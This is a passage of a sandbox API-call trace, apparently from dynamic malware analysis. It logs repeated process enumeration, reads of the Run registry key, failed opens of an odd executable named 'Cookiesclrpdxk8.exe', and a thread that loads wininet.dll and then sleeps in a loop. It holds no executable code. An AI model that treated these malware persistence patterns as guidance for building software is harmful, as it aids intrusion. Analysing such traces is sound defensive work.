BaseAddress=0xdea4c*=0x0, ZeroBits=0x0, RegionSize=0xdea50*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea4c*=0x4e0000, RegionSize=0xdea50*=0x20000) returned 0x0 [0304.611] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x4e0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x4e0000, ResultLength=0x0) returned 0x0 [0304.709] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x4e0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0304.710] NtDelayExecution (Alertable=0, Interval=0xdea70*=-50000000) returned 0x0 [0304.712] NtCreateKey (in: KeyHandle=0xdea70, DesiredAccess=0x20219, ObjectAttributes=0xde1e0*(Length=0x18, RootDirectory=0x0, ObjectName="\\Registry\\User\\S-1-5-21-1560258661-3990802383-1811730007-1000\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Run", Attributes=0x40, SecurityDescriptor=0x0, SecurityQualityOfService=0x0), TitleIndex=0x0, Class=0x0, CreateOptions=0x0, Disposition=0x0 | out: KeyHandle=0xdea70*=0x338) returned 0x0 [0304.713] NtEnumerateValueKey (in: KeyHandle=0x338, Index=0x0, KeyValueInformationClass=0x1, KeyValueInformation=0xde434, Length=0x200, ResultLength=0xde834 | out: KeyValueInformation=0xde434, ResultLength=0xde834) returned 0x0 [0304.713] NtClose (Handle=0x338) returned 0x0 [0304.713] RtlDosPathNameToNtPathName_U (in: DosPathName="C:\\Program Files (x86)\\Wrvtps4_h\\Cookiesclrpdxk8.exe", NtPathName=0xde81c, NtFileNamePart=0x0, DirectoryInfo=0x0 | out: NtPathName="\\??\\C:\\Program Files (x86)\\Wrvtps4_h\\Cookiesclrpdxk8.exe", NtFileNamePart=0x0, DirectoryInfo=0x0) returned 1 [0304.713] NtCreateFile (in: FileHandle=0xde83c, DesiredAccess=0x120089, ObjectAttributes=0xde804*(Length=0x18, RootDirectory=0x0, ObjectName="\\??\\C:\\Program Files (x86)\\Wrvtps4_h\\Cookiesclrpdxk8.exe", Attributes=0x40, SecurityDescriptor=0x0, SecurityQualityOfService=0x0), IoStatusBlock=0xde824, AllocationSize=0x0, FileAttributes=0x80, ShareAccess=0x7, CreateDisposition=0x1, CreateOptions=0x60, EaBuffer=0x0, EaLength=0x0 | out: FileHandle=0xde83c*=0x0, IoStatusBlock=0xde824*(Status=0x0, Pointer=0x0, Information=0x0)) returned 0xc000003a [0304.713] RtlFreeHeap (HeapHandle=0x570000, Flags=0x0, BaseAddress=0x5de520) returned 1 [0304.713] RtlDosPathNameToNtPathName_U (in: DosPathName="C:\\Program Files (x86)\\Wrvtps4_h\\Cookiesclrpdxk8.exe", NtPathName=0xdea38, NtFileNamePart=0x0, DirectoryInfo=0x0 | out: NtPathName="\\??\\C:\\Program Files (x86)\\Wrvtps4_h\\Cookiesclrpdxk8.exe", NtFileNamePart=0x0, DirectoryInfo=0x0) returned 1 [0304.713] NtCreateFile (in: FileHandle=0xdea58, DesiredAccess=0x120089, ObjectAttributes=0xdea20*(Length=0x18, RootDirectory=0x0, ObjectName="\\??\\C:\\Program Files (x86)\\Wrvtps4_h\\Cookiesclrpdxk8.exe", Attributes=0x40, SecurityDescriptor=0x0, SecurityQualityOfService=0x0), IoStatusBlock=0xdea40, AllocationSize=0x0, FileAttributes=0x80, ShareAccess=0x7, CreateDisposition=0x1, CreateOptions=0x60, EaBuffer=0x0, EaLength=0x0 | out: FileHandle=0xdea58*=0x0, IoStatusBlock=0xdea40*(Status=0x0, Pointer=0x0, Information=0x0)) returned 0xc000003a [0304.713] RtlFreeHeap (HeapHandle=0x570000, Flags=0x0, BaseAddress=0x5de520) returned 1 [0304.713] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea60*=0x0, ZeroBits=0x0, RegionSize=0xdea64*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea60*=0x4e0000, RegionSize=0xdea64*=0x10000) returned 0x0 [0304.714] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x4e0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x4e0000, ResultLength=0x0) returned 0xc0000004 [0304.716] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x4e0000, RegionSize=0xdea84, FreeType=0x8000) returned 0x0 [0304.716] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea4c*=0x0, ZeroBits=0x0, RegionSize=0xdea50*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea4c*=0x4e0000, RegionSize=0xdea50*=0x20000) returned 0x0 [0304.716] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x4e0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x4e0000, ResultLength=0x0) returned 0x0 [0304.838] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x4e0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0304.838] NtDelayExecution (Alertable=0, Interval=0xdea70*=-50000000) returned 0x0 [0304.840] NtCreateKey (in: KeyHandle=0xdea70, DesiredAccess=0x20219, ObjectAttributes=0xde1e0*(Length=0x18, RootDirectory=0x0, ObjectName="\\Registry\\User\\S-1-5-21-1560258661-3990802383-1811730007-1000\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Run", Attributes=0x40, SecurityDescriptor=0x0, SecurityQualityOfService=0x0), TitleIndex=0x0, Class=0x0, CreateOptions=0x0, Disposition=0x0 | out: KeyHandle=0xdea70*=0x338) returned 0x0 [0304.841] NtEnumerateValueKey (in: KeyHandle=0x338, Index=0x0, KeyValueInformationClass=0x1, KeyValueInformation=0xde434, Length=0x200, ResultLength=0xde834 | out: KeyValueInformation=0xde434, ResultLength=0xde834) returned 0x0 [0304.841] NtClose (Handle=0x338) returned 0x0 [0304.841] RtlDosPathNameToNtPathName_U (in: DosPathName="C:\\Program Files (x86)\\Wrvtps4_h\\Cookiesclrpdxk8.exe", NtPathName=0xde81c, NtFileNamePart=0x0, DirectoryInfo=0x0 | out: NtPathName="\\??\\C:\\Program Files (x86)\\Wrvtps4_h\\Cookiesclrpdxk8.exe", NtFileNamePart=0x0, DirectoryInfo=0x0) returned 1 [0304.841] NtCreateFile (in: FileHandle=0xde83c, DesiredAccess=0x120089, ObjectAttributes=0xde804*(Length=0x18, RootDirectory=0x0, ObjectName="\\??\\C:\\Program Files (x86)\\Wrvtps4_h\\Cookiesclrpdxk8.exe", Attributes=0x40, SecurityDescriptor=0x0, SecurityQualityOfService=0x0), IoStatusBlock=0xde824, AllocationSize=0x0, FileAttributes=0x80, ShareAccess=0x7, CreateDisposition=0x1, CreateOptions=0x60, EaBuffer=0x0, EaLength=0x0 | out: FileHandle=0xde83c*=0x0, IoStatusBlock=0xde824*(Status=0x0, Pointer=0x0, Information=0x0)) returned 0xc000003a [0304.841] RtlFreeHeap (HeapHandle=0x570000, Flags=0x0, BaseAddress=0x5de920) returned 1 [0304.841] RtlDosPathNameToNtPathName_U (in: DosPathName="C:\\Program Files (x86)\\Wrvtps4_h\\Cookiesclrpdxk8.exe", NtPathName=0xdea38, NtFileNamePart=0x0, DirectoryInfo=0x0 | out: NtPathName="\\??\\C:\\Program Files (x86)\\Wrvtps4_h\\Cookiesclrpdxk8.exe", NtFileNamePart=0x0, DirectoryInfo=0x0) returned 1 [0304.841] NtCreateFile (in: FileHandle=0xdea58, DesiredAccess=0x120089, ObjectAttributes=0xdea20*(Length=0x18, RootDirectory=0x0, ObjectName="\\??\\C:\\Program Files (x86)\\Wrvtps4_h\\Cookiesclrpdxk8.exe", Attributes=0x40, SecurityDescriptor=0x0, SecurityQualityOfService=0x0), IoStatusBlock=0xdea40, AllocationSize=0x0, FileAttributes=0x80, ShareAccess=0x7, CreateDisposition=0x1, CreateOptions=0x60, EaBuffer=0x0, EaLength=0x0 | out: FileHandle=0xdea58*=0x0, IoStatusBlock=0xdea40*(Status=0x0, Pointer=0x0, Information=0x0)) returned 0xc000003a [0304.841] RtlFreeHeap (HeapHandle=0x570000, Flags=0x0, BaseAddress=0x5de520) returned 1 [0304.841] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea60*=0x0, ZeroBits=0x0, RegionSize=0xdea64*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea60*=0x4e0000, RegionSize=0xdea64*=0x10000) returned 0x0 [0304.842] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x4e0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x4e0000, ResultLength=0x0) returned 0xc0000004 [0304.844] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x4e0000, RegionSize=0xdea84, FreeType=0x8000) returned 0x0 [0304.845] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea4c*=0x0, ZeroBits=0x0, RegionSize=0xdea50*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea4c*=0x4e0000, RegionSize=0xdea50*=0x20000) returned 0x0 [0304.845] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x4e0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x4e0000, ResultLength=0x0) returned 0x0 [0304.944] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x4e0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0304.945] NtDelayExecution (Alertable=0, Interval=0xdea70*=-50000000) returned 0x0 [0304.947] NtCreateKey (in: KeyHandle=0xdea70, DesiredAccess=0x20219, ObjectAttributes=0xde1e0*(Length=0x18, RootDirectory=0x0, ObjectName="\\Registry\\User\\S-1-5-21-1560258661-3990802383-1811730007-1000\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Run", Attributes=0x40, SecurityDescriptor=0x0, SecurityQualityOfService=0x0), TitleIndex=0x0, Class=0x0, CreateOptions=0x0, Disposition=0x0 | out: KeyHandle=0xdea70*=0x338) returned 0x0 [0304.948] NtEnumerateValueKey (in: KeyHandle=0x338, Index=0x0, KeyValueInformationClass=0x1, KeyValueInformation=0xde434, Length=0x200, ResultLength=0xde834 | out: KeyValueInformation=0xde434, ResultLength=0xde834) returned 0x0 [0304.948] NtClose (Handle=0x338) returned 0x0 [0304.948] RtlDosPathNameToNtPathName_U (in: DosPathName="C:\\Program Files (x86)\\Wrvtps4_h\\Cookiesclrpdxk8.exe", NtPathName=0xde81c, NtFileNamePart=0x0, DirectoryInfo=0x0 | out: NtPathName="\\??\\C:\\Program Files (x86)\\Wrvtps4_h\\Cookiesclrpdxk8.exe", NtFileNamePart=0x0, DirectoryInfo=0x0) returned 1 [0304.948] NtCreateFile (in: FileHandle=0xde83c, DesiredAccess=0x120089, ObjectAttributes=0xde804*(Length=0x18, RootDirectory=0x0, ObjectName="\\??\\C:\\Program Files (x86)\\Wrvtps4_h\\Cookiesclrpdxk8.exe", Attributes=0x40, SecurityDescriptor=0x0, SecurityQualityOfService=0x0), IoStatusBlock=0xde824, AllocationSize=0x0, FileAttributes=0x80, ShareAccess=0x7, CreateDisposition=0x1, CreateOptions=0x60, EaBuffer=0x0, EaLength=0x0 | out: FileHandle=0xde83c*=0x0, IoStatusBlock=0xde824*(Status=0x0, Pointer=0x0, Information=0x0)) returned 0xc000003a [0304.948] RtlFreeHeap (HeapHandle=0x570000, Flags=0x0, BaseAddress=0x5ddfa0) returned 1 [0304.948] RtlDosPathNameToNtPathName_U (in: DosPathName="C:\\Program Files (x86)\\Wrvtps4_h\\Cookiesclrpdxk8.exe", NtPathName=0xdea38, NtFileNamePart=0x0, DirectoryInfo=0x0 | out: NtPathName="\\??\\C:\\Program Files (x86)\\Wrvtps4_h\\Cookiesclrpdxk8.exe", NtFileNamePart=0x0, DirectoryInfo=0x0) returned 1 [0304.948] NtCreateFile (in: FileHandle=0xdea58, DesiredAccess=0x120089, ObjectAttributes=0xdea20*(Length=0x18, RootDirectory=0x0, ObjectName="\\??\\C:\\Program Files (x86)\\Wrvtps4_h\\Cookiesclrpdxk8.exe", Attributes=0x40, SecurityDescriptor=0x0, SecurityQualityOfService=0x0), IoStatusBlock=0xdea40, AllocationSize=0x0, FileAttributes=0x80, ShareAccess=0x7, CreateDisposition=0x1, CreateOptions=0x60, EaBuffer=0x0, EaLength=0x0 | out: FileHandle=0xdea58*=0x0, IoStatusBlock=0xdea40*(Status=0x0, Pointer=0x0, Information=0x0)) returned 0xc000003a [0304.948] RtlFreeHeap (HeapHandle=0x570000, Flags=0x0, BaseAddress=0x5de120) returned 1 [0304.948] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea60*=0x0, ZeroBits=0x0, RegionSize=0xdea64*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea60*=0x4e0000, RegionSize=0xdea64*=0x10000) returned 0x0 [0304.949] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x4e0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x4e0000, ResultLength=0x0) returned 0xc0000004 [0304.951] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x4e0000, RegionSize=0xdea84, FreeType=0x8000) returned 0x0 [0304.951] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea4c*=0x0, ZeroBits=0x0, RegionSize=0xdea50*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea4c*=0x4e0000, RegionSize=0xdea50*=0x20000) returned 0x0 [0304.951] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x4e0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x4e0000, ResultLength=0x0) returned 0x0 Thread: id = 58 os_tid = 0xe58 Thread: id = 59 os_tid = 0xe54 Thread: id = 65 os_tid = 0xe3c [0115.547] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x12aff58*=0x0, ZeroBits=0x0, RegionSize=0x12aff5c*=0x28050, AllocationType=0x3000, Protect=0x4 | out: BaseAddress=0x12aff58*=0x75a0000, RegionSize=0x12aff5c*=0x29000) returned 0x0 [0115.551] LdrLoadDll (in: SearchPath=0x0, LoadFlags=0x0, Name="wininet.dll", BaseAddress=0x12aff44 | out: BaseAddress=0x12aff44*=0x703a0000) returned 0x0 [0116.206] Sleep (dwMilliseconds=0x7d0) [0118.314] Sleep (dwMilliseconds=0x7d0) [0120.434] Sleep (dwMilliseconds=0x7d0) [0122.450] Sleep (dwMilliseconds=0x7d0) [0124.478] Sleep (dwMilliseconds=0x7d0) [0126.561] Sleep (dwMilliseconds=0x7d0) [0128.589] Sleep (dwMilliseconds=0x7d0) [0130.617] Sleep (dwMilliseconds=0x7d0) [0132.701] Sleep (dwMilliseconds=0x7d0) [0134.705] Sleep (dwMilliseconds=0x7d0) [0136.739] Sleep (dwMilliseconds=0x7d0) [0136.785] Sleep (dwMilliseconds=0x7d0) [0136.789] Sleep (dwMilliseconds=0x7d0) [0136.802] Sleep (dwMilliseconds=0x7d0) [0136.806] Sleep (dwMilliseconds=0x7d0) [0136.812] Sleep (dwMilliseconds=0x7d0) [0136.915] Sleep (dwMilliseconds=0x7d0) [0136.925] Sleep (dwMilliseconds=0x7d0) [0136.932] Sleep (dwMilliseconds=0x7d0) [0136.941] Sleep (dwMilliseconds=0x7d0) [0136.945] Sleep (dwMilliseconds=0x7d0) [0136.954] Sleep (dwMilliseconds=0x7d0) [0136.962] Sleep (dwMilliseconds=0x7d0) [0137.017] Sleep (dwMilliseconds=0x7d0) [0137.074] Sleep (dwMilliseconds=0x7d0) [0137.173] Sleep (dwMilliseconds=0x7d0) [0137.192] Sleep (dwMilliseconds=0x7d0) [0137.203] Sleep (dwMilliseconds=0x7d0) [0137.212] Sleep (dwMilliseconds=0x7d0) [0137.221] Sleep (dwMilliseconds=0x7d0) [0137.234] Sleep (dwMilliseconds=0x7d0) [0137.242] Sleep (dwMilliseconds=0x7d0) [0137.244] Sleep (dwMilliseconds=0x7d0) [0137.253] Sleep (dwMilliseconds=0x7d0) [0137.263] Sleep (dwMilliseconds=0x7d0) [0137.269] Sleep (dwMilliseconds=0x7d0) [0137.286] Sleep (dwMilliseconds=0x7d0) [0137.291] Sleep (dwMilliseconds=0x7d0) [0137.300] Sleep (dwMilliseconds=0x7d0) [0137.307] Sleep (dwMilliseconds=0x7d0) [0137.317] Sleep (dwMilliseconds=0x7d0) [0137.326] Sleep (dwMilliseconds=0x7d0) [0137.353] Sleep (dwMilliseconds=0x7d0) [0137.357] Sleep (dwMilliseconds=0x7d0) [0137.360] Sleep (dwMilliseconds=0x7d0) [0137.366] Sleep (dwMilliseconds=0x7d0) [0137.374] Sleep (dwMilliseconds=0x7d0) [0137.536] Sleep (dwMilliseconds=0x7d0) [0137.555] Sleep (dwMilliseconds=0x7d0) [0137.568] Sleep (dwMilliseconds=0x7d0) [0137.571] Sleep (dwMilliseconds=0x7d0) [0137.578] Sleep (dwMilliseconds=0x7d0) [0137.589] Sleep (dwMilliseconds=0x7d0) [0137.597] Sleep (dwMilliseconds=0x7d0) [0137.626] Sleep (dwMilliseconds=0x7d0) [0137.628] Sleep (dwMilliseconds=0x7d0) [0137.630] Sleep (dwMilliseconds=0x7d0) [0137.653] Sleep (dwMilliseconds=0x7d0) [0137.662] Sleep (dwMilliseconds=0x7d0) [0137.975] Sleep (dwMilliseconds=0x7d0) [0138.006] Sleep (dwMilliseconds=0x7d0) [0138.010] Sleep (dwMilliseconds=0x7d0) [0138.015] Sleep (dwMilliseconds=0x7d0) [0138.037] Sleep (dwMilliseconds=0x7d0) [0138.055] Sleep (dwMilliseconds=0x7d0) [0138.060] Sleep (dwMilliseconds=0x7d0) [0138.091] Sleep (dwMilliseconds=0x7d0) [0138.238] Sleep (dwMilliseconds=0x7d0) [0138.438] Sleep (dwMilliseconds=0x7d0) [0138.454] Sleep (dwMilliseconds=0x7d0) [0138.458] Sleep (dwMilliseconds=0x7d0) [0138.473] Sleep (dwMilliseconds=0x7d0) [0138.512] Sleep (dwMilliseconds=0x7d0) [0138.526] Sleep (dwMilliseconds=0x7d0) [0138.532] Sleep (dwMilliseconds=0x7d0) [0138.535] Sleep (dwMilliseconds=0x7d0) [0138.548] Sleep (dwMilliseconds=0x7d0) [0138.558] Sleep (dwMilliseconds=0x7d0) [0138.568] Sleep (dwMilliseconds=0x7d0) [0138.579] Sleep (dwMilliseconds=0x7d0) [0138.586] Sleep (dwMilliseconds=0x7d0) [0138.590] Sleep (dwMilliseconds=0x7d0) [0138.600] Sleep (dwMilliseconds=0x7d0) [0138.617] Sleep (dwMilliseconds=0x7d0) [0138.627] Sleep (dwMilliseconds=0x7d0) [0138.652] Sleep (dwMilliseconds=0x7d0) [0138.696] Sleep (dwMilliseconds=0x7d0) [0138.797] Sleep (dwMilliseconds=0x7d0) [0138.880] Sleep (dwMilliseconds=0x7d0) [0138.923] Sleep (dwMilliseconds=0x7d0) [0138.949] Sleep (dwMilliseconds=0x7d0) [0138.983] Sleep (dwMilliseconds=0x7d0) [0139.014] Sleep (dwMilliseconds=0x7d0) [0139.024] Sleep (dwMilliseconds=0x7d0) [0139.045] Sleep (dwMilliseconds=0x7d0) [0139.078] Sleep (dwMilliseconds=0x7d0) [0139.108] Sleep (dwMilliseconds=0x7d0) [0139.112] Sleep (dwMilliseconds=0x7d0) [0139.116] Sleep (dwMilliseconds=0x7d0) [0139.123] Sleep (dwMilliseconds=0x7d0) [0139.142] Sleep (dwMilliseconds=0x7d0) [0139.239] Sleep (dwMilliseconds=0x7d0) [0139.356] Sleep (dwMilliseconds=0x7d0) [0139.369] Sleep (dwMilliseconds=0x7d0) [0139.378] Sleep (dwMilliseconds=0x7d0) [0139.381] Sleep (dwMilliseconds=0x7d0) [0139.395] Sleep (dwMilliseconds=0x7d0) [0139.412] Sleep (dwMilliseconds=0x7d0) [0139.427] Sleep (dwMilliseconds=0x7d0) [0139.455] Sleep (dwMilliseconds=0x7d0) [0139.468] Sleep (dwMilliseconds=0x7d0) [0139.534] Sleep (dwMilliseconds=0x7d0) [0139.654] Sleep (dwMilliseconds=0x7d0) [0139.666] Sleep (dwMilliseconds=0x7d0) [0139.672] Sleep (dwMilliseconds=0x7d0) [0139.687] Sleep (dwMilliseconds=0x7d0) [0139.700] Sleep (dwMilliseconds=0x7d0) [0139.708] Sleep (dwMilliseconds=0x7d0) [0139.716] Sleep (dwMilliseconds=0x7d0) [0139.728] Sleep (dwMilliseconds=0x7d0) [0139.737] Sleep (dwMilliseconds=0x7d0) [0139.746] Sleep (dwMilliseconds=0x7d0) [0139.762] Sleep (dwMilliseconds=0x7d0) [0139.767] Sleep (dwMilliseconds=0x7d0) [0139.772] Sleep (dwMilliseconds=0x7d0) [0139.782] Sleep (dwMilliseconds=0x7d0) [0139.795] Sleep (dwMilliseconds=0x7d0) [0139.805] Sleep (dwMilliseconds=0x7d0) [0139.824] Sleep (dwMilliseconds=0x7d0) [0139.829] Sleep (dwMilliseconds=0x7d0) [0139.832] Sleep (dwMilliseconds=0x7d0) [0139.834] Sleep (dwMilliseconds=0x7d0) [0139.840] Sleep (dwMilliseconds=0x7d0) [0139.849] Sleep (dwMilliseconds=0x7d0) [0139.855] Sleep (dwMilliseconds=0x7d0) [0139.882] Sleep (dwMilliseconds=0x7d0) [0139.888] Sleep (dwMilliseconds=0x7d0) [0139.892] Sleep (dwMilliseconds=0x7d0) [0139.919] Sleep (dwMilliseconds=0x7d0) [0139.927] Sleep (dwMilliseconds=0x7d0) [0139.949] Sleep (dwMilliseconds=0x7d0) [0139.956] Sleep (dwMilliseconds=0x7d0) [0140.064] Sleep (dwMilliseconds=0x7d0) [0140.130] Sleep (dwMilliseconds=0x7d0) [0140.141] Sleep (dwMilliseconds=0x7d0) [0140.158] Sleep (dwMilliseconds=0x7d0) [0140.171] Sleep (dwMilliseconds=0x7d0) [0140.216] Sleep (dwMilliseconds=0x7d0) [0140.235] Sleep (dwMilliseconds=0x7d0) [0140.245] Sleep (dwMilliseconds=0x7d0) [0140.254] Sleep (dwMilliseconds=0x7d0) [0140.283] Sleep (dwMilliseconds=0x7d0) [0140.314] Sleep (dwMilliseconds=0x7d0) [0140.329] Sleep (dwMilliseconds=0x7d0) [0140.435] Sleep (dwMilliseconds=0x7d0) [0140.495] Sleep (dwMilliseconds=0x7d0) [0140.504] Sleep (dwMilliseconds=0x7d0) [0140.521] Sleep (dwMilliseconds=0x7d0) [0140.535] Sleep (dwMilliseconds=0x7d0) [0140.557] Sleep (dwMilliseconds=0x7d0) [0140.560] Sleep (dwMilliseconds=0x7d0) [0140.566] Sleep (dwMilliseconds=0x7d0) [0140.577] Sleep (dwMilliseconds=0x7d0) [0140.595] Sleep (dwMilliseconds=0x7d0) [0140.619] Sleep (dwMilliseconds=0x7d0) [0140.644] Sleep (dwMilliseconds=0x7d0) [0140.647] Sleep (dwMilliseconds=0x7d0) [0140.812] Sleep (dwMilliseconds=0x7d0) [0140.884] Sleep (dwMilliseconds=0x7d0) [0140.916] Sleep (dwMilliseconds=0x7d0) [0140.919] Sleep (dwMilliseconds=0x7d0) [0140.930] Sleep (dwMilliseconds=0x7d0) [0140.957] Sleep (dwMilliseconds=0x7d0) [0140.966] Sleep (dwMilliseconds=0x7d0) [0140.976] Sleep (dwMilliseconds=0x7d0) [0140.983] Sleep (dwMilliseconds=0x7d0) [0140.995] Sleep (dwMilliseconds=0x7d0) [0141.036] Sleep (dwMilliseconds=0x7d0) [0141.038] Sleep (dwMilliseconds=0x7d0) [0141.042] Sleep (dwMilliseconds=0x7d0) [0141.044] Sleep (dwMilliseconds=0x7d0) [0141.052] Sleep (dwMilliseconds=0x7d0) [0141.063] Sleep (dwMilliseconds=0x7d0) [0141.083] Sleep (dwMilliseconds=0x7d0) [0141.086] Sleep (dwMilliseconds=0x7d0) [0141.090] Sleep (dwMilliseconds=0x7d0) [0141.484] Sleep (dwMilliseconds=0x7d0) [0141.567] Sleep (dwMilliseconds=0x7d0) [0141.636] Sleep (dwMilliseconds=0x7d0) [0141.730] Sleep (dwMilliseconds=0x7d0) [0141.873] Sleep (dwMilliseconds=0x7d0) [0142.077] Sleep (dwMilliseconds=0x7d0) [0142.155] Sleep (dwMilliseconds=0x7d0) [0142.222] Sleep (dwMilliseconds=0x7d0) [0142.287] Sleep (dwMilliseconds=0x7d0) [0142.360] Sleep (dwMilliseconds=0x7d0) [0142.599] Sleep (dwMilliseconds=0x7d0) [0142.779] Sleep (dwMilliseconds=0x7d0) [0142.855] Sleep (dwMilliseconds=0x7d0) [0142.894] Sleep (dwMilliseconds=0x7d0) [0142.967] Sleep (dwMilliseconds=0x7d0) [0143.046] Sleep (dwMilliseconds=0x7d0) [0143.122] Sleep (dwMilliseconds=0x7d0) [0143.197] Sleep (dwMilliseconds=0x7d0) [0143.246] Sleep (dwMilliseconds=0x7d0) [0143.309] Sleep (dwMilliseconds=0x7d0) [0143.406] Sleep (dwMilliseconds=0x7d0) [0143.494] Sleep (dwMilliseconds=0x7d0) [0143.519] Sleep (dwMilliseconds=0x7d0) [0143.534] Sleep (dwMilliseconds=0x7d0) [0143.570] Sleep (dwMilliseconds=0x7d0) [0143.609] Sleep (dwMilliseconds=0x7d0) [0143.645] Sleep (dwMilliseconds=0x7d0) [0143.681] Sleep (dwMilliseconds=0x7d0) [0143.698] Sleep (dwMilliseconds=0x7d0) [0143.807] Sleep (dwMilliseconds=0x7d0) [0143.871] Sleep (dwMilliseconds=0x7d0) [0144.010] Sleep (dwMilliseconds=0x7d0) [0144.053] Sleep (dwMilliseconds=0x7d0) [0144.064] Sleep (dwMilliseconds=0x7d0) [0144.098] Sleep (dwMilliseconds=0x7d0) [0144.141] Sleep (dwMilliseconds=0x7d0) [0144.187] Sleep (dwMilliseconds=0x7d0) [0144.237] Sleep (dwMilliseconds=0x7d0) [0144.278] Sleep (dwMilliseconds=0x7d0) [0144.327] Sleep (dwMilliseconds=0x7d0) [0144.372] Sleep (dwMilliseconds=0x7d0) [0144.419] Sleep (dwMilliseconds=0x7d0) [0144.487] Sleep (dwMilliseconds=0x7d0) [0144.515] Sleep (dwMilliseconds=0x7d0) [0144.611] Sleep (dwMilliseconds=0x7d0) [0144.775] Sleep (dwMilliseconds=0x7d0) [0144.820] Sleep (dwMilliseconds=0x7d0) [0144.856] Sleep (dwMilliseconds=0x7d0) [0144.867] Sleep (dwMilliseconds=0x7d0) [0144.906] Sleep (dwMilliseconds=0x7d0) [0144.951] Sleep (dwMilliseconds=0x7d0) [0144.982] Sleep (dwMilliseconds=0x7d0) [0144.990] Sleep (dwMilliseconds=0x7d0) [0145.026] Sleep (dwMilliseconds=0x7d0) [0145.062] Sleep (dwMilliseconds=0x7d0) [0145.093] Sleep (dwMilliseconds=0x7d0) [0145.119] Sleep (dwMilliseconds=0x7d0) [0145.164] Sleep (dwMilliseconds=0x7d0) [0145.227] Sleep (dwMilliseconds=0x7d0) [0145.272] Sleep (dwMilliseconds=0x7d0) [0145.402] Sleep (dwMilliseconds=0x7d0) [0145.528] Sleep (dwMilliseconds=0x7d0) [0145.636] Sleep (dwMilliseconds=0x7d0) [0145.676] Sleep (dwMilliseconds=0x7d0) [0145.713] Sleep (dwMilliseconds=0x7d0) [0145.722] Sleep (dwMilliseconds=0x7d0) [0145.764] Sleep (dwMilliseconds=0x7d0) [0145.806] Sleep (dwMilliseconds=0x7d0) [0145.842] Sleep (dwMilliseconds=0x7d0) [0145.869] Sleep (dwMilliseconds=0x7d0) [0145.881] Sleep (dwMilliseconds=0x7d0) [0145.917] Sleep (dwMilliseconds=0x7d0) [0145.953] Sleep (dwMilliseconds=0x7d0) [0145.992] Sleep (dwMilliseconds=0x7d0) [0146.026] Sleep (dwMilliseconds=0x7d0) [0146.094] Sleep (dwMilliseconds=0x7d0) [0146.132] Sleep (dwMilliseconds=0x7d0) [0146.181] Sleep (dwMilliseconds=0x7d0) [0146.321] Sleep (dwMilliseconds=0x7d0) [0146.369] Sleep (dwMilliseconds=0x7d0) [0146.419] Sleep (dwMilliseconds=0x7d0) [0146.507] Sleep (dwMilliseconds=0x7d0) [0146.559] Sleep (dwMilliseconds=0x7d0) [0146.587] Sleep (dwMilliseconds=0x7d0) [0146.625] Sleep (dwMilliseconds=0x7d0) [0146.697] Sleep (dwMilliseconds=0x7d0) [0146.751] Sleep (dwMilliseconds=0x7d0) [0146.797] Sleep (dwMilliseconds=0x7d0) [0146.821] Sleep (dwMilliseconds=0x7d0) [0146.841] Sleep (dwMilliseconds=0x7d0) [0146.895] Sleep (dwMilliseconds=0x7d0) [0146.939] Sleep (dwMilliseconds=0x7d0) [0146.991] Sleep (dwMilliseconds=0x7d0) [0147.029] Sleep (dwMilliseconds=0x7d0) [0147.042] Sleep (dwMilliseconds=0x7d0) [0147.222] Sleep (dwMilliseconds=0x7d0) [0147.334] Sleep (dwMilliseconds=0x7d0) [0147.423] Sleep (dwMilliseconds=0x7d0) [0147.449] Sleep (dwMilliseconds=0x7d0) [0147.623] Sleep (dwMilliseconds=0x7d0) [0147.702] Sleep (dwMilliseconds=0x7d0) [0147.757] Sleep (dwMilliseconds=0x7d0) [0147.799] Sleep (dwMilliseconds=0x7d0) [0147.817] Sleep (dwMilliseconds=0x7d0) [0147.857] Sleep (dwMilliseconds=0x7d0) [0147.896] Sleep (dwMilliseconds=0x7d0) [0147.934] Sleep (dwMilliseconds=0x7d0) [0147.972] Sleep 